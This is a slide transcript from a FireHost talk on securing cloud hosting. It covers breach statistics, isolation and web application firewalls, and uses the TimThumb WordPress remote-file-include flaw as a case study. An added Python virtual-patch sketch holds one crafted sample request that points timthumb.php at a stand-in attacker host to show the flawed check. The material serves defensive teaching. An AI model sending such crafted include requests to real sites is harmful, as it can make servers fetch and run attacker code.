Secure Cloud Hosting: Real Requirements to Protect Your Data

Post on 12-Jan-2015

Category:

Technology

DESCRIPTION

FireHost's Senior Security Engineer will discuss the need for acute awareness to secure data in the Cloud, and how the advancement of the environment has also accelerated the way this technology can be breached. The session will also include case studies on attacks and what you need to be asking yourself and your provider.

TRANSCRIPT

Chris Hinkley, Senior Security Engineer

www.firehost.com  @incrediblehink

Secure Cloud Hosting: Real Requirements to Protect Your Data

WHAT IS THE CLOUD?

One Word, Infinite Definitions

Cloud computing provides computation, software, data access, and storage services that do not require end-user knowledge of the physical location and configuration of the system that delivers the services.

the secure cloud /THē siˈkyo͝or kloud/

A virtualized, multi-tenant infrastructure, providing customers with architectural agility, instant scalability and environmental security.

WHY THE CLOUD?

It Far Outweighs The Alternatives

•Cost savings with virtualization

•Getting out of the hardware and software management business

•Ease and speed of scaling

•Niche cloud service providers that are specializing in secure cloud hosting

WHO IS MOVING TO THE CLOUD?

Google Trends

[Figure: Google Trends screenshots for "Cloud Hosting" and "Cloud Security". Scale is based on the average search traffic in the world. Search volume ON THE RISE.]

WHO IS MOVING TO THE CLOUD?

Google Trends

[Figure: Google Trends screenshot for "Dedicated Hosting". Scale is based on the average search traffic in the world. Search volume ON THE DECLINE.]

CAN THE CLOUD BE SECURE?

Just The Facts Please

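[Chart: Location/Hosting of assets by percent of breaches*. Categories: Internal, External, Co-Located, Mobile, N/A, Unknown.]

[Chart: Management of assets by percent of breaches*. Categories: Internal, External, Co-Managed, N/A, Unknown.]

[Chart values as extracted from the slide: 48%, 34%, 16%; 76%, 14%, 6%; 5%; 1% Mobile; 2% Unknown; 2% Unknown; 6%.]

*Verizon caseload only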

“We are often asked whether the Cloud factors into many of the breaches we investigate. The easy answer is No–not really. It’s more about giving up control of our assets and data (and not controlling the associated risk) than any technology specific to the Cloud.”

CAN THE CLOUD BE SECURE?

Just The Facts Please

Attack targeting by percent of breaches*: Opportunistic 83%, Targeted 17%

Attack difficulty by percent of breaches*: None 6%, Low 49%, Medium 37%, High 8%

*Verizon caseload only

“Given the industry’s hyper-focus on cloud computing, we do our best to track relevant details during breach investigations and subsequent analysis. We have yet to see a breach involving a successful attack against the hypervisor.”

HOW CAN YOU CREATE ISOLATION?

Separating Your Data

•Network Traffic Separation

•Virtual Machine Isolation

•Storage Separation

•Multi-tenant Security Devices

KEEPING HACKERS AT BAY

Protecting Your Web Application

•Security in your SDLC

•Code Review

•Vulnerability Scanning

•Penetration Testing

•Change Management

SECURITY IN DEPTH

Web Application Firewalls

•Security in Depth

•Firewalls=sledgehammer

•WAFs=scalpel

•Signatures and Profiling

•Virtual Patching

•0-day Mitigation

CASE STUDY

TimThumb WordPress Plugin

•Image Resizing Plugin for WordPress Blogs

•Included In Many Themes

•0-Day Remote File Include Exploit

•Flawed Logic allowed trivial RFI

FIX ALL THE THINGS

Virtually Instant Patching

•Applying a single ‘patch’ Secured Many

•Allowed Adequate Time

•Provided Security / Preserved Functionality
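
An added example, not from the slides or from FireHost: a sketch of the kind of virtual patch described here, written as a Python request filter that blocks remote includes through timthumb.php while leaving local resizing and the rest of the site alone. It assumes the "flawed logic" was a substring match on the remote host in the src parameter (the slides do not say); the allowlist, function names and sample requests are constructed.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed allowlist of image hosts (assumption, not from the slides).
ALLOWED_HOSTS = ("flickr.com", "picasa.com", "img.youtube.com")

def loose_host_check(host):
    """Assumed flawed logic: allowlisted name may appear anywhere in host."""
    return any(site in host for site in ALLOWED_HOSTS)

def strict_host_check(host):
    """Accept only an allowlisted host or a true subdomain of one."""
    host = host.rstrip(".")
    return any(host == s or host.endswith("." + s) for s in ALLOWED_HOSTS)

def virtual_patch(request_uri):
    """Return 'allow' or 'block' for one request URI, WAF-style.

    Only timthumb.php requests are inspected, so the rest of the site is
    untouched and local image resizing keeps working.
    """
    url = urlsplit(request_uri)
    if not url.path.lower().endswith("/timthumb.php"):
        return "allow"
    for src in parse_qs(url.query).get("src", []):
        try:
            target = urlsplit(src.strip())
            host = (target.hostname or "").lower()
        except ValueError:
            return "block"  # unparseable URL: fail closed
        if not target.scheme and not target.netloc:
            continue  # local path, normal resizing
        if target.scheme.lower() not in ("http", "https"):
            return "block"
        if not strict_host_check(host):
            return "block"
    return "allow"

# Constructed sample requests (hypothetical paths and hosts).
SAMPLES = [
    "/wp-content/themes/x/timthumb.php?src=/wp-content/uploads/a.jpg&w=100",
    "/wp-content/themes/x/timthumb.php?src=http://farm1.flickr.com/a.jpg",
    "/wp-content/themes/x/timthumb.php?src=http://flickr.com.attacker.example/x.php",
    "/index.php?p=1",
]

if __name__ == "__main__":
    for uri in SAMPLES:
        print(virtual_patch(uri), uri)
```

The loose check accepts the third sample's host because the allowlisted name appears inside it; the strict check used by the filter does not.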

IN CONCLUSION

Cloud Security Is Not A Myth

•Traditional infrastructure is no more secure than the cloud.

•Tackle the low-hanging fruit first.

•Your application evolves. So should your security.

Thank You

Questions?

Email chris.hinkley@firehost.com

Twitter twitter.com/FireHost

Chris Hinkley
